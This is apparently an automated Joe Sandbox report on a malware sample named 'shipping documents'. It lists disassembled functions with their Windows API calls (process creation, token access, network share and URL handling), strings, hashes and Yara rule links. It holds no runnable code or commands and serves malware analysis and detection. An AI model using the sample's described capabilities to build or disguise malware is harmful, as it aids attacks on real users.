API String ID: 357397906-0
Opcode ID: 22dd4180203abc6017a599394385c3db27124c49c081852419a3c916734dde69
Instruction ID: e3062c49514a6650303790f08d754a072c7acbf36186bd4bac9f1521370b6e97
Opcode Fuzzy Hash: 22dd4180203abc6017a599394385c3db27124c49c081852419a3c916734dde69
Instruction Fuzzy Hash: 431163B9D00249EFDB01CFA9D8849EEFBB9FB08310F109166E915E3720D731AA518F90

Function 006DB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006DB8FE
_memset.LIBCMT ref: 006DB90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00717F20,00717F64), ref: 006DB93C
CloseHandle.KERNEL32 ref: 006DB94E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 56b7d7a91fd07fcada7dc1fa97ee78c57fc2095465c40f5f5784c5918affb79a
Instruction ID: f36811fa157d35681f0a6e3046b339685034ea3dec0de8dfffd1e501e0962aaa
Opcode Fuzzy Hash: 56b7d7a91fd07fcada7dc1fa97ee78c57fc2095465c40f5f5784c5918affb79a
Instruction Fuzzy Hash: BDF05EB2544310BBE3106769AC06FFB3AAEEB09754F01D031BA09D52D2D7798902C7AD

Function 006B6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 006B6E88

Part of subcall function 006B794E: _memset.LIBCMT ref: 006B7983

_memmove.LIBCMT ref: 006B6EAB
_memset.LIBCMT ref: 006B6EB8
LeaveCriticalSection.KERNEL32(?), ref: 006B6EC8

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: c3f78375985cbb92bd5498568a4c367e5daba9a37900c5c101b87b4e56ca7cb1
Instruction ID: d4b0e55a295cd2497474a6734b37912d715bda29f2993605537bab3755b7e4d9
Opcode Fuzzy Hash: c3f78375985cbb92bd5498568a4c367e5daba9a37900c5c101b87b4e56ca7cb1
Instruction Fuzzy Hash: 92F0547A100210AFCF416F95DC85A89BB2BEF45320B04C065FE095F217C731A951DBB5

Function 006DC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 006512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0065134D
Part of subcall function 006512F3: SelectObject.GDI32(?,00000000), ref: 0065135C
Part of subcall function 006512F3: BeginPath.GDI32(?), ref: 00651373
Part of subcall function 006512F3: SelectObject.GDI32(?,00000000), ref: 0065139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006DC030
LineTo.GDI32(00000000,?,?), ref: 006DC03D
EndPath.GDI32(00000000), ref: 006DC04D
StrokePath.GDI32(00000000), ref: 006DC05B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 9b2d0c1ddb6a7a09f11408f09e86cc3466867f50cdc7d487f86965a2c3199db6
Instruction ID: 171d9a8f9b2bdf3b42ea0b03582a413b9d2e76a00222467fea24b7877119e934
Opcode Fuzzy Hash: 9b2d0c1ddb6a7a09f11408f09e86cc3466867f50cdc7d487f86965a2c3199db6
Instruction Fuzzy Hash: 58F0E931401219F7DB121F54AC09FCE3F566F05311F048001FA12211E1C7750650CFD9

Function 006AA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006AA399
GetWindowThreadProcessId.USER32(?,00000000), ref: 006AA3AC
GetCurrentThreadId.KERNEL32 ref: 006AA3B3
AttachThreadInput.USER32(00000000), ref: 006AA3BA

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 5a4bb87a4c70b6d5c6b88215351fc4cd4ff79b692600f3af6819cacd72750fc5
Instruction ID: 929295b5cbc405cddae55bf0b6edd2f30b654ef7fc77ecaf7c30f64f7f81e79e
Opcode Fuzzy Hash: 5a4bb87a4c70b6d5c6b88215351fc4cd4ff79b692600f3af6819cacd72750fc5
Instruction Fuzzy Hash: F0E01531942268BADF202BA2DC0CEE73F1EEF167A1F048026B50AC4460C771C940CBA0

Function 00652218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00652231
SetTextColor.GDI32(?,000000FF), ref: 0065223B
SetBkMode.GDI32(?,00000001), ref: 00652250
GetStockObject.GDI32(00000005), ref: 00652258
GetWindowDC.USER32(?,00000000), ref: 0068C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0068C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0068C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0068C112
GetPixel.GDI32(00000000,?,?), ref: 0068C132
ReleaseDC.USER32(?,00000000), ref: 0068C13D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 68c7b6ba081dce46c7c4b32eeee895d9adcb476fc325b6941985ff170d154602
Instruction ID: 6b7416263d6d0919634c0217eb540012d7c1670c83f87727b2d47cf833787f94
Opcode Fuzzy Hash: 68c7b6ba081dce46c7c4b32eeee895d9adcb476fc325b6941985ff170d154602
Instruction Fuzzy Hash: 85E06D32900244EADB215FA4FC0D7D83B12EB16332F048367FAAA481E187724A84DB21

Function 006A8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 006A8C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,006A882E), ref: 006A8C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006A882E), ref: 006A8C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,006A882E), ref: 006A8C7E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 48977ee24e0aa0abcb950b3206cef81fa57cf1b2f38535598b4e836bafc43513
Instruction ID: c8c6153501b415f68d5161d8e5d69516f80df3cb72e4946d44d7be70e78a30ff
Opcode Fuzzy Hash: 48977ee24e0aa0abcb950b3206cef81fa57cf1b2f38535598b4e836bafc43513
Instruction Fuzzy Hash: 96E04F36A432119BD7206FB06D0CB963BAAAF51BA2F099829B247CA040DA3488418F61

Function 00692187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00692187
GetDC.USER32(00000000), ref: 00692191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006921B1
ReleaseDC.USER32(?), ref: 006921D2

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b5723bf9377e7b7ccf3f9789163db14cf3969b3bcaa07713b9f5c51eeb24abfa
Instruction ID: 9329d55918f88e2a91c778720557c270cec3a231b81124195f8c128d31db97bf
Opcode Fuzzy Hash: b5723bf9377e7b7ccf3f9789163db14cf3969b3bcaa07713b9f5c51eeb24abfa
Instruction Fuzzy Hash: 61E0E575801204EFDF119F60C808A9D7BF6EB4C361F10842AFD5B97620CB3982429F50

Function 0069219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0069219B
GetDC.USER32(00000000), ref: 006921A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006921B1
ReleaseDC.USER32(?), ref: 006921D2

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 7eb01dd8a8bc11730ea89aa9c322d72f1f16f261c8f7015f137e9697a71e2bbe
Instruction ID: 2cce584e16bda52f87285989bef682fdbfc4f66a04b14d76be80e0cedc900719
Opcode Fuzzy Hash: 7eb01dd8a8bc11730ea89aa9c322d72f1f16f261c8f7015f137e9697a71e2bbe
Instruction Fuzzy Hash: DFE0EEB5C01204AFCB119FA0C80869D7BE2EB4C321F10802AF95AA7620CB3992429F50

Function 006563A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%n, xrefs: 006563AE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID: %n
API String ID: 0-2798127140
Opcode ID: 68de02212e4ebf6f74dacde5bf68099f4d2d292021a5a4518f9061fd34e503ae
Instruction ID: 5c4c324fae1ed6786e06cafbeeb4520107acbae130223e7b654d8e0bffaf9db3
Opcode Fuzzy Hash: 68de02212e4ebf6f74dacde5bf68099f4d2d292021a5a4518f9061fd34e503ae
Instruction Fuzzy Hash: 5AB1A37190010A9BCF14EF94C4959EDB7B6FF44312F94416AFD02A7291EB309E8ACB65

Function 006CB1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 006CB2C3

Strings

xrq, xrefs: 006CB325
xrq, xrefs: 006CB2F9

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __itow_s
String ID: xrq$xrq
API String ID: 3653519197-2399829976
Opcode ID: 1e2c87e4bc416ebfed2c11892f1987a451ab739698451b609c3c06d28251a103
Instruction ID: eb94c269c3e9fc45d465307c6ce41f4dce8e859d48faccaa78d4e1bde8c3c14b
Opcode Fuzzy Hash: 1e2c87e4bc416ebfed2c11892f1987a451ab739698451b609c3c06d28251a103
Instruction Fuzzy Hash: 0EB17E70A04209AFCB14DF54C891EFAB7BAFF58300F14945DF9459B292DB34DA85CB64

Function 006BB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0066FEC6: _wcscpy.LIBCMT ref: 0066FEE9

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

__wcsnicmp.LIBCMT ref: 006BB298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 006BB361

Strings

LPT, xrefs: 006BB292

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 1324ac450a22528659710a91058d8e2b9c073abae455c0db7e138621cd21cfc0
Instruction ID: a7295571355fdfd8d4aaf00b1e7dab4e6153bdc119aef5b9669a71f6b5749d7f
Opcode Fuzzy Hash: 1324ac450a22528659710a91058d8e2b9c073abae455c0db7e138621cd21cfc0
Instruction Fuzzy Hash: AF6160B5A00219EFCB14DF54C881EEEB7F6AF08310F15505AF946AB391DBB0AE84CB54

Function 00698A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00698B1E
_memmove.LIBCMT ref: 00698B78

Strings

Oaf, xrefs: 00698BF2, 0069E39A, 0069E3B6

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memmove
String ID: Oaf
API String ID: 4104443479-1555074404
Opcode ID: 2595069ae295486306208ec29ce359bb72bb0a4b749955b45350b7f300c18984
Instruction ID: 593c4c5f0c6ee02d700a85a7a4de875b67765e651cf9230d21452d44e87a0c83
Opcode Fuzzy Hash: 2595069ae295486306208ec29ce359bb72bb0a4b749955b45350b7f300c18984
Instruction Fuzzy Hash: 2B512BB0A00609DFCF64CF68C880AAEBBB6FF45314F14452AE85AD7750EB31AD55CB51

Function 00662AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00662AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00662AE1

Strings

@, xrefs: 00662AD5

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: cc2a638f1d332ed4748c39d0685582fadf32bb32e2ea4372d744a888769eed07
Instruction ID: 31e45818ff2933c4d1c09a4cb3107c9291942f81cd239cc0e8c90b0036f53fd8
Opcode Fuzzy Hash: cc2a638f1d332ed4748c39d0685582fadf32bb32e2ea4372d744a888769eed07
Instruction Fuzzy Hash: 63514472418744DBD360AF50DC86BABBBE8FF84315F82885DF5D9411A1DB30892DCB2A

Function 006B99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0065506B: __fread_nolock.LIBCMT ref: 00655089

_wcscmp.LIBCMT ref: 006B9AAE
_wcscmp.LIBCMT ref: 006B9AC1

Strings

FILE, xrefs: 006B99FA

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 26ef2698b9018ac36892192b8a082aefb426a9886bcdafecd843b8a6b44eac31
Instruction ID: f927a386418d14a3fb72d21e5038b9088ddae599f7a1a6e8285d68e92699497f
Opcode Fuzzy Hash: 26ef2698b9018ac36892192b8a082aefb426a9886bcdafecd843b8a6b44eac31
Instruction Fuzzy Hash: 4041D6B1A00619BBDF20AAA0DC45FEFBBFEDF45710F00406DBA05A72C1DA759A4487A5

Function 0069099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 006909A9

Strings

Dtq, xrefs: 0065A477
Dtq, xrefs: 0065A2B1

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ClearVariant
String ID: Dtq$Dtq
API String ID: 1473721057-1304160401
Opcode ID: fed3bb58366379b44add380654ec57c0998ae7daa6cb834093d1684a5314a746
Instruction ID: c93dd07e44a0a6719ace18af1798a81cdf8a2af7ce8a6687bd02f41e73036e7a
Opcode Fuzzy Hash: fed3bb58366379b44add380654ec57c0998ae7daa6cb834093d1684a5314a746
Instruction Fuzzy Hash: BE5104786083418FD754CF58C080A6ABBF2BB99355F548A5DE8858B361D332EC85CB82

Function 006C2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006C2892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006C28C8

Strings

|, xrefs: 006C2899

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: f57c3df70feb79328dd8987c53ebd6da8c2028a9a1544a737fba737bcf07c559
Instruction ID: b981268f39d462b2932f239f658ae6b3a1308956fdcfbba08efc4b4146efcd0f
Opcode Fuzzy Hash: f57c3df70feb79328dd8987c53ebd6da8c2028a9a1544a737fba737bcf07c559
Instruction Fuzzy Hash: 25311C7180011AAFCF41DFA1DC85EEEBFBAFF08310F104069FC15A6265DA31595ADB60

Function 006D6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 006D6D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006D6DC2

Strings

static, xrefs: 006D6D22

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: ef75e1a6383c3eb517a0a9b36af0ebcab8100d58744a6414869bbbbf8262970c
Instruction ID: 12b1322953e19dc191c1f426f98011ce7fa38bf2de4bbdb8423480a322da2c45
Opcode Fuzzy Hash: ef75e1a6383c3eb517a0a9b36af0ebcab8100d58744a6414869bbbbf8262970c
Instruction Fuzzy Hash: 0B31A171600204AEDB109F24DC40BFB73BAFF48720F10961EF89687290CB31AC51CB64

Function 006B2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006B2E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006B2E3B

Strings

0, xrefs: 006B2DF9

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 89375ac7179dfd0909a34da9247e746e057a5153be22ac384b9b99b5d902e119
Instruction ID: e6bc118ee11d517f6a9ab584a85c1263cc68c6ed2a63b59ed78b19e4ff67b69c
Opcode Fuzzy Hash: 89375ac7179dfd0909a34da9247e746e057a5153be22ac384b9b99b5d902e119
Instruction Fuzzy Hash: 7131F7B1600306ABEB248F49C8857EEBBFBFF45340F14402EE985962A1E770D9C2CB15

Function 006D6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006D69D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006D69DB

Strings

Combobox, xrefs: 006D699D

Memory Dump Source

